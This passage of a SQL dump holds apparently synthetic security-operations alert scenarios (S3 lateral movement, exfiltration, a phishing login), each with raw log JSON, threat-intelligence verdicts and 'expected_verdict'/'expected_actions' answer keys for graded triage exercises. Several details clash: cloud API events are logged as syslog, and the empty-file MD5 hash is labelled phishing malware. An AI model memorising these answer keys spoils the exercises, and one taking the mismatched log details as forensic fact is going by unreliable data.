Linux/5.4.0-1029\\\",\\\"requestParameters\\\":{\\\"policyName\\\":\\\"PersistencePolicy\\\",\\\"policyDocument\\\":{\\\"Version\\\":\\\"2012-10-17\\\",\\\"Statement\\\":[{\\\"Effect\\\":\\\"Allow\\\",\\\"Action\\\":\\\"s3:ListBucket\\\",\\\"Resource\\\":\\\"arn:aws:s3:::example_bucket\\\"}]}},\\\"responseElements\\\":{\\\"policy\\\":{\\\"policyName\\\":\\\"PersistencePolicy\\\",\\\"policyId\\\":\\\"ANPAEXAMPLE\\\",\\\"arn\\\":\\\"arn:aws:iam::123456789012:policy/PersistencePolicy\\\",\\\"path\\\":\\\"/\\\",\\\"defaultVersionId\\\":\\\"v1\\\"}},\\\"requestID\\\":\\\"EXAMPLE-1111-2222-3333-4444\\\",\\\"eventID\\\":\\\"EXAMPLE-5678-9101-1121-3141\\\",\\\"readOnly\\\":false,\\\"eventType\\\":\\\"AwsApiCall\\\",\\\"managementEvent\\\":true,\\\"recipientAccountId\\\":\\\"123456789012\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.540Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"eventVersion\\\":\\\"1.08\\\",\\\"userIdentity\\\":{\\\"type\\\":\\\"AssumedRole\\\",\\\"principalId\\\":\\\"AROAEXAMPLE:attacker-session\\\",\\\"arn\\\":\\\"arn:aws:sts::123456789012:assumed-role/CompromisedRole/attacker-session\\\",\\\"accountId\\\":\\\"123456789012\\\",\\\"accessKeyId\\\":\\\"ASIAEXAMPLE\\\"},\\\"eventTime\\\":\\\"2023-09-15T14:56:30Z\\\",\\\"eventSource\\\":\\\"iam.amazonaws.com\\\",\\\"eventName\\\":\\\"CreatePolicy\\\",\\\"awsRegion\\\":\\\"us-west-2\\\",\\\"sourceIPAddress\\\":\\\"198.51.100.23\\\",\\\"userAgent\\\":\\\"aws-cli/2.0.30 Python/3.7.3 Linux/5.4.0-1029\\\",\\\"requestParameters\\\":{\\\"policyName\\\":\\\"PersistencePolicy\\\",\\\"policyDocument\\\":{\\\"Version\\\":\\\"2012-10-17\\\",\\\"Statement\\\":[{\\\"Effect\\\":\\\"Allow\\\",\\\"Action\\\":\\\"s3:ListBucket\\\",\\\"Resource\\\":\\\"arn:aws:s3:::example_bucket\\\"}]}},\\\"responseElements\\\":{\\\"policy\\\":{\\\"policyName\\\":\\\"PersistencePolicy\\\",\\\"policyId\\\":\\\"ANPAEXAMPLE\\\",\\\"arn\\\":\\\"arn:aws:iam::123456789012:policy/PersistencePolicy\\\",\\\"path\\\":\\\"/\\\",\\\"defaultVersionId\\\":\\\"v1\\\"}},\\\"requestID\\\":\\\"EXAMPLE-1111-2222-3333-4444\\\",\\\"eventID\\\":\\\"EXAMPLE-5678-9101-1121-3141\\\",\\\"readOnly\\\":false,\\\"eventType\\\":\\\"AwsApiCall\\\",\\\"managementEvent\\\":true,\\\"recipientAccountId\\\":\\\"123456789012\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(874, 'Lateral Movement to Sensitive Data Stores', 'critical', 'S3 Access Logs', 'The attacker moved laterally within the AWS environment, accessing multiple S3 buckets containing sensitive credit application data. The attacker used compromised credentials to authenticate from a known malicious IP address, targeting the S3 buckets with sensitive data.', 'Lateral Movement', 'T1080', 1, 'resolved', NULL, '{\"eventVersion\":\"1.08\",\"eventSource\":\"s3.amazonaws.com\",\"awsRegion\":\"us-west-2\",\"eventTime\":\"2023-10-05T14:48:00Z\",\"eventName\":\"GetObject\",\"userIdentity\":{\"type\":\"IAMUser\",\"principalId\":\"AIDAEXAMPLE\",\"arn\":\"arn:aws:iam::123456789012:user/compromised_user\",\"accountId\":\"123456789012\",\"userName\":\"compromised_user\"},\"requestParameters\":{\"bucketName\":\"credit-applications\",\"key\":\"sensitive_data/credit_2023.csv\"},\"sourceIPAddress\":\"203.0.113.45\",\"userAgent\":\"aws-sdk-java/1.11.648 Linux/5.4.0-1046-aws OpenJDK_64-Bit_Server_VM/11.0.11+9-LTS\",\"responseElements\":{\"x-amz-request-id\":\"1A2B3C4D5E6F7G8H\",\"x-amz-id-2\":\"EXAMPLEBASE64STRING=\"},\"additionalEventData\":{\"bytesTransferredIn\":0,\"bytesTransferredOut\":2048,\"x-amz-id-2\":\"EXAMPLEBASE64STRING==\",\"x-amz-request-id\":\"1A2B3C4D5E6F7G8H\"},\"requestID\":\"1A2B3C4D5E6F7G8H\",\"eventID\":\"4c6c6b7c-8c6c-4c6c-b6c6-6c6c6c6c6c6c\",\"readOnly\":true,\"resources\":[{\"type\":\"AWS::S3::Object\",\"ARN\":\"arn:aws:s3:::credit-applications/sensitive_data/credit_2023.csv\"}],\"eventType\":\"AwsApiCall\",\"recipientAccountId\":\"123456789012\"}', '2026-01-15 00:53:58', '2026-02-16 17:56:52', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AlienVault OTX\",\"verdict\":\"malicious\",\"details\":\"IP associated with known malicious activities.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Logs\",\"verdict\":\"internal\",\"details\":\"IAM user account compromised.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"credit_2023.csv\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Data Classification\",\"verdict\":\"internal\",\"details\":\"File contains sensitive credit application data.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'expert', 'CLOUD', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.542Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"eventVersion\\\":\\\"1.08\\\",\\\"eventSource\\\":\\\"s3.amazonaws.com\\\",\\\"awsRegion\\\":\\\"us-west-2\\\",\\\"eventTime\\\":\\\"2023-10-05T14:48:00Z\\\",\\\"eventName\\\":\\\"GetObject\\\",\\\"userIdentity\\\":{\\\"type\\\":\\\"IAMUser\\\",\\\"principalId\\\":\\\"AIDAEXAMPLE\\\",\\\"arn\\\":\\\"arn:aws:iam::123456789012:user/compromised_user\\\",\\\"accountId\\\":\\\"123456789012\\\",\\\"userName\\\":\\\"compromised_user\\\"},\\\"requestParameters\\\":{\\\"bucketName\\\":\\\"credit-applications\\\",\\\"key\\\":\\\"sensitive_data/credit_2023.csv\\\"},\\\"sourceIPAddress\\\":\\\"203.0.113.45\\\",\\\"userAgent\\\":\\\"aws-sdk-java/1.11.648 Linux/5.4.0-1046-aws OpenJDK_64-Bit_Server_VM/11.0.11+9-LTS\\\",\\\"responseElements\\\":{\\\"x-amz-request-id\\\":\\\"1A2B3C4D5E6F7G8H\\\",\\\"x-amz-id-2\\\":\\\"EXAMPLEBASE64STRING=\\\"},\\\"additionalEventData\\\":{\\\"bytesTransferredIn\\\":0,\\\"bytesTransferredOut\\\":2048,\\\"x-amz-id-2\\\":\\\"EXAMPLEBASE64STRING==\\\",\\\"x-amz-request-id\\\":\\\"1A2B3C4D5E6F7G8H\\\"},\\\"requestID\\\":\\\"1A2B3C4D5E6F7G8H\\\",\\\"eventID\\\":\\\"4c6c6b7c-8c6c-4c6c-b6c6-6c6c6c6c6c6c\\\",\\\"readOnly\\\":true,\\\"resources\\\":[{\\\"type\\\":\\\"AWS::S3::Object\\\",\\\"ARN\\\":\\\"arn:aws:s3:::credit-applications/sensitive_data/credit_2023.csv\\\"}],\\\"eventType\\\":\\\"AwsApiCall\\\",\\\"recipientAccountId\\\":\\\"123456789012\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.542Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"eventVersion\\\":\\\"1.08\\\",\\\"eventSource\\\":\\\"s3.amazonaws.com\\\",\\\"awsRegion\\\":\\\"us-west-2\\\",\\\"eventTime\\\":\\\"2023-10-05T14:48:00Z\\\",\\\"eventName\\\":\\\"GetObject\\\",\\\"userIdentity\\\":{\\\"type\\\":\\\"IAMUser\\\",\\\"principalId\\\":\\\"AIDAEXAMPLE\\\",\\\"arn\\\":\\\"arn:aws:iam::123456789012:user/compromised_user\\\",\\\"accountId\\\":\\\"123456789012\\\",\\\"userName\\\":\\\"compromised_user\\\"},\\\"requestParameters\\\":{\\\"bucketName\\\":\\\"credit-applications\\\",\\\"key\\\":\\\"sensitive_data/credit_2023.csv\\\"},\\\"sourceIPAddress\\\":\\\"203.0.113.45\\\",\\\"userAgent\\\":\\\"aws-sdk-java/1.11.648 Linux/5.4.0-1046-aws OpenJDK_64-Bit_Server_VM/11.0.11+9-LTS\\\",\\\"responseElements\\\":{\\\"x-amz-request-id\\\":\\\"1A2B3C4D5E6F7G8H\\\",\\\"x-amz-id-2\\\":\\\"EXAMPLEBASE64STRING=\\\"},\\\"additionalEventData\\\":{\\\"bytesTransferredIn\\\":0,\\\"bytesTransferredOut\\\":2048,\\\"x-amz-id-2\\\":\\\"EXAMPLEBASE64STRING==\\\",\\\"x-amz-request-id\\\":\\\"1A2B3C4D5E6F7G8H\\\"},\\\"requestID\\\":\\\"1A2B3C4D5E6F7G8H\\\",\\\"eventID\\\":\\\"4c6c6b7c-8c6c-4c6c-b6c6-6c6c6c6c6c6c\\\",\\\"readOnly\\\":true,\\\"resources\\\":[{\\\"type\\\":\\\"AWS::S3::Object\\\",\\\"ARN\\\":\\\"arn:aws:s3:::credit-applications/sensitive_data/credit_2023.csv\\\"}],\\\"eventType\\\":\\\"AwsApiCall\\\",\\\"recipientAccountId\\\":\\\"123456789012\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.542Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"eventVersion\\\":\\\"1.08\\\",\\\"eventSource\\\":\\\"s3.amazonaws.com\\\",\\\"awsRegion\\\":\\\"us-west-2\\\",\\\"eventTime\\\":\\\"2023-10-05T14:48:00Z\\\",\\\"eventName\\\":\\\"GetObject\\\",\\\"userIdentity\\\":{\\\"type\\\":\\\"IAMUser\\\",\\\"principalId\\\":\\\"AIDAEXAMPLE\\\",\\\"arn\\\":\\\"arn:aws:iam::123456789012:user/compromised_user\\\",\\\"accountId\\\":\\\"123456789012\\\",\\\"userName\\\":\\\"compromised_user\\\"},\\\"requestParameters\\\":{\\\"bucketName\\\":\\\"credit-applications\\\",\\\"key\\\":\\\"sensitive_data/credit_2023.csv\\\"},\\\"sourceIPAddress\\\":\\\"203.0.113.45\\\",\\\"userAgent\\\":\\\"aws-sdk-java/1.11.648 Linux/5.4.0-1046-aws OpenJDK_64-Bit_Server_VM/11.0.11+9-LTS\\\",\\\"responseElements\\\":{\\\"x-amz-request-id\\\":\\\"1A2B3C4D5E6F7G8H\\\",\\\"x-amz-id-2\\\":\\\"EXAMPLEBASE64STRING=\\\"},\\\"additionalEventData\\\":{\\\"bytesTransferredIn\\\":0,\\\"bytesTransferredOut\\\":2048,\\\"x-amz-id-2\\\":\\\"EXAMPLEBASE64STRING==\\\",\\\"x-amz-request-id\\\":\\\"1A2B3C4D5E6F7G8H\\\"},\\\"requestID\\\":\\\"1A2B3C4D5E6F7G8H\\\",\\\"eventID\\\":\\\"4c6c6b7c-8c6c-4c6c-b6c6-6c6c6c6c6c6c\\\",\\\"readOnly\\\":true,\\\"resources\\\":[{\\\"type\\\":\\\"AWS::S3::Object\\\",\\\"ARN\\\":\\\"arn:aws:s3:::credit-applications/sensitive_data/credit_2023.csv\\\"}],\\\"eventType\\\":\\\"AwsApiCall\\\",\\\"recipientAccountId\\\":\\\"123456789012\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.542Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"eventVersion\\\":\\\"1.08\\\",\\\"eventSource\\\":\\\"s3.amazonaws.com\\\",\\\"awsRegion\\\":\\\"us-west-2\\\",\\\"eventTime\\\":\\\"2023-10-05T14:48:00Z\\\",\\\"eventName\\\":\\\"GetObject\\\",\\\"userIdentity\\\":{\\\"type\\\":\\\"IAMUser\\\",\\\"principalId\\\":\\\"AIDAEXAMPLE\\\",\\\"arn\\\":\\\"arn:aws:iam::123456789012:user/compromised_user\\\",\\\"accountId\\\":\\\"123456789012\\\",\\\"userName\\\":\\\"compromised_user\\\"},\\\"requestParameters\\\":{\\\"bucketName\\\":\\\"credit-applications\\\",\\\"key\\\":\\\"sensitive_data/credit_2023.csv\\\"},\\\"sourceIPAddress\\\":\\\"203.0.113.45\\\",\\\"userAgent\\\":\\\"aws-sdk-java/1.11.648 Linux/5.4.0-1046-aws OpenJDK_64-Bit_Server_VM/11.0.11+9-LTS\\\",\\\"responseElements\\\":{\\\"x-amz-request-id\\\":\\\"1A2B3C4D5E6F7G8H\\\",\\\"x-amz-id-2\\\":\\\"EXAMPLEBASE64STRING=\\\"},\\\"additionalEventData\\\":{\\\"bytesTransferredIn\\\":0,\\\"bytesTransferredOut\\\":2048,\\\"x-amz-id-2\\\":\\\"EXAMPLEBASE64STRING==\\\",\\\"x-amz-request-id\\\":\\\"1A2B3C4D5E6F7G8H\\\"},\\\"requestID\\\":\\\"1A2B3C4D5E6F7G8H\\\",\\\"eventID\\\":\\\"4c6c6b7c-8c6c-4c6c-b6c6-6c6c6c6c6c6c\\\",\\\"readOnly\\\":true,\\\"resources\\\":[{\\\"type\\\":\\\"AWS::S3::Object\\\",\\\"ARN\\\":\\\"arn:aws:s3:::credit-applications/sensitive_data/credit_2023.csv\\\"}],\\\"eventType\\\":\\\"AwsApiCall\\\",\\\"recipientAccountId\\\":\\\"123456789012\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.542Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"eventVersion\\\":\\\"1.08\\\",\\\"eventSource\\\":\\\"s3.amazonaws.com\\\",\\\"awsRegion\\\":\\\"us-west-2\\\",\\\"eventTime\\\":\\\"2023-10-05T14:48:00Z\\\",\\\"eventName\\\":\\\"GetObject\\\",\\\"userIdentity\\\":{\\\"type\\\":\\\"IAMUser\\\",\\\"principalId\\\":\\\"AIDAEXAMPLE\\\",\\\"arn\\\":\\\"arn:aws:iam::123456789012:user/compromised_user\\\",\\\"accountId\\\":\\\"123456789012\\\",\\\"userName\\\":\\\"compromised_user\\\"},\\\"requestParameters\\\":{\\\"bucketName\\\":\\\"credit-applications\\\",\\\"key\\\":\\\"sensitive_data/credit_2023.csv\\\"},\\\"sourceIPAddress\\\":\\\"203.0.113.45\\\",\\\"userAgent\\\":\\\"aws-sdk-java/1.11.648 Linux/5.4.0-1046-aws OpenJDK_64-Bit_Server_VM/11.0.11+9-LTS\\\",\\\"responseElements\\\":{\\\"x-amz-request-id\\\":\\\"1A2B3C4D5E6F7G8H\\\",\\\"x-amz-id-2\\\":\\\"EXAMPLEBASE64STRING=\\\"},\\\"additionalEventData\\\":{\\\"bytesTransferredIn\\\":0,\\\"bytesTransferredOut\\\":2048,\\\"x-amz-id-2\\\":\\\"EXAMPLEBASE64STRING==\\\",\\\"x-amz-request-id\\\":\\\"1A2B3C4D5E6F7G8H\\\"},\\\"requestID\\\":\\\"1A2B3C4D5E6F7G8H\\\",\\\"eventID\\\":\\\"4c6c6b7c-8c6c-4c6c-b6c6-6c6c6c6c6c6c\\\",\\\"readOnly\\\":true,\\\"resources\\\":[{\\\"type\\\":\\\"AWS::S3::Object\\\",\\\"ARN\\\":\\\"arn:aws:s3:::credit-applications/sensitive_data/credit_2023.csv\\\"}],\\\"eventType\\\":\\\"AwsApiCall\\\",\\\"recipientAccountId\\\":\\\"123456789012\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(875, 'Exfiltration of Sensitive Data', 'critical', 'VPC Flow Logs', 'An attacker exfiltrated sensitive data using encrypted channels, covering tracks to avoid detection by standard monitoring tools.', 'Data Exfiltration', 'T1020 - Automated Exfiltration', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-05T13:45:30Z\",\"src_ip\":\"10.1.1.15\",\"dst_ip\":\"203.0.113.45\",\"protocol\":\"TCP\",\"src_port\":443,\"dst_port\":443,\"bytes_sent\":10485760,\"bytes_received\":1024,\"action\":\"ACCEPT\",\"session_start\":\"2023-10-05T13:40:00Z\",\"session_end\":\"2023-10-05T13:45:30Z\",\"user\":\"jdoe\",\"file_hash\":\"3e8b7f7e21c9a3e0b5f7f6a5c8f1b9d3\",\"file_name\":\"sensitive_data.zip\"}', '2026-01-15 00:53:58', '2026-02-16 17:56:58', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known exfiltration server associated with APT group.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.1.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host potentially compromised.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3e8b7f7e21c9a3e0b5f7f6a5c8f1b9d3\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with data exfiltration tool.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"sensitive_data.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Audit\",\"verdict\":\"suspicious\",\"details\":\"File name indicative of sensitive data.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal HR Records\",\"verdict\":\"clean\",\"details\":\"Valid employee account.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'expert', 'CLOUD', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.544Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T13:45:30Z\\\",\\\"src_ip\\\":\\\"10.1.1.15\\\",\\\"dst_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"TCP\\\",\\\"src_port\\\":443,\\\"dst_port\\\":443,\\\"bytes_sent\\\":10485760,\\\"bytes_received\\\":1024,\\\"action\\\":\\\"ACCEPT\\\",\\\"session_start\\\":\\\"2023-10-05T13:40:00Z\\\",\\\"session_end\\\":\\\"2023-10-05T13:45:30Z\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_hash\\\":\\\"3e8b7f7e21c9a3e0b5f7f6a5c8f1b9d3\\\",\\\"file_name\\\":\\\"sensitive_data.zip\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.544Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T13:45:30Z\\\",\\\"src_ip\\\":\\\"10.1.1.15\\\",\\\"dst_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"TCP\\\",\\\"src_port\\\":443,\\\"dst_port\\\":443,\\\"bytes_sent\\\":10485760,\\\"bytes_received\\\":1024,\\\"action\\\":\\\"ACCEPT\\\",\\\"session_start\\\":\\\"2023-10-05T13:40:00Z\\\",\\\"session_end\\\":\\\"2023-10-05T13:45:30Z\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_hash\\\":\\\"3e8b7f7e21c9a3e0b5f7f6a5c8f1b9d3\\\",\\\"file_name\\\":\\\"sensitive_data.zip\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.544Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T13:45:30Z\\\",\\\"src_ip\\\":\\\"10.1.1.15\\\",\\\"dst_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"TCP\\\",\\\"src_port\\\":443,\\\"dst_port\\\":443,\\\"bytes_sent\\\":10485760,\\\"bytes_received\\\":1024,\\\"action\\\":\\\"ACCEPT\\\",\\\"session_start\\\":\\\"2023-10-05T13:40:00Z\\\",\\\"session_end\\\":\\\"2023-10-05T13:45:30Z\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_hash\\\":\\\"3e8b7f7e21c9a3e0b5f7f6a5c8f1b9d3\\\",\\\"file_name\\\":\\\"sensitive_data.zip\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.544Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T13:45:30Z\\\",\\\"src_ip\\\":\\\"10.1.1.15\\\",\\\"dst_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"TCP\\\",\\\"src_port\\\":443,\\\"dst_port\\\":443,\\\"bytes_sent\\\":10485760,\\\"bytes_received\\\":1024,\\\"action\\\":\\\"ACCEPT\\\",\\\"session_start\\\":\\\"2023-10-05T13:40:00Z\\\",\\\"session_end\\\":\\\"2023-10-05T13:45:30Z\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_hash\\\":\\\"3e8b7f7e21c9a3e0b5f7f6a5c8f1b9d3\\\",\\\"file_name\\\":\\\"sensitive_data.zip\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.544Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T13:45:30Z\\\",\\\"src_ip\\\":\\\"10.1.1.15\\\",\\\"dst_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"TCP\\\",\\\"src_port\\\":443,\\\"dst_port\\\":443,\\\"bytes_sent\\\":10485760,\\\"bytes_received\\\":1024,\\\"action\\\":\\\"ACCEPT\\\",\\\"session_start\\\":\\\"2023-10-05T13:40:00Z\\\",\\\"session_end\\\":\\\"2023-10-05T13:45:30Z\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_hash\\\":\\\"3e8b7f7e21c9a3e0b5f7f6a5c8f1b9d3\\\",\\\"file_name\\\":\\\"sensitive_data.zip\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(876, 'Suspicious Login Attempt Detected', 'medium', 'SIEM Logs', 'A suspicious login attempt was detected from an external IP address. The attempt involved a targeted spear-phishing campaign aiming to harvest employee credentials. The attacker used a known malicious IP address to attempt access to an internal Twitter employee account.', 'Initial Access', 'T1078 - Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:11Z\",\"event_id\":\"1001\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\",\"username\":\"jdoe\",\"action\":\"login_attempt\",\"status\":\"failed\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36\",\"email_subject\":\"Urgent: Update Your Password\",\"malware_hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}', '2026-01-15 00:55:54', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP used in previous phishing campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"Internal IP address of targeted employee workstation.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"clean\",\"details\":\"Active employee account.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known phishing malware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\"]}', 'beginner', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.545Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:11Z\\\",\\\"event_id\\\":\\\"1001\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"jdoe\\\",\\\"action\\\":\\\"login_attempt\\\",\\\"status\\\":\\\"failed\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36\\\",\\\"email_subject\\\":\\\"Urgent: Update Your Password\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.545Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:11Z\\\",\\\"event_id\\\":\\\"1001\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"jdoe\\\",\\\"action\\\":\\\"login_attempt\\\",\\\"status\\\":\\\"failed\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36\\\",\\\"email_subject\\\":\\\"Urgent: Update Your Password\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.545Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:11Z\\\",\\\"event_id\\\":\\\"1001\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"jdoe\\\",\\\"action\\\":\\\"login_attempt\\\",\\\"status\\\":\\\"failed\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36\\\",\\\"email_subject\\\":\\\"Urgent: Update Your Password\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.545Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:11Z\\\",\\\"event_id\\\":\\\"1001\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"jdoe\\\",\\\"action\\\":\\\"login_attempt\\\",\\\"status\\\":\\\"failed\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36\\\",\\\"email_subject\\\":\\\"Urgent: Update Your 